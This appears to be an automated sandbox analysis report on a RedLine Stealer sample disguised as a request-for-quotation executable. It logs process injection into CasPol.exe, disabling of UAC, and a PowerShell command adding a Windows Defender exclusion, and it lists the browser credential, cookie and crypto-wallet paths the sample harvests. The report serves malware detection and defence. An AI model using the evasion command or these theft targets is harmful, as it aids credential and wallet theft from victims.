                    Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: CasPol.exe, 00000005.00000002.2220039755.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmpE9F2.tmp.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmpE9F2.tmp.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmpE9F2.tmp.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: tmpE9F2.tmp.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmpE9F2.tmp.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: tmpE9F2.tmp.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -ForceJump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 29D008Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeQueries volume information: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Disables UAC (registry)
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2322806230.000002DBAA700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDER8A823C34
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		311
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		341
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                    Virtualization/Sandbox Evasion                    		Security Account Manager251
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                    Process Injection                    		NTDS1
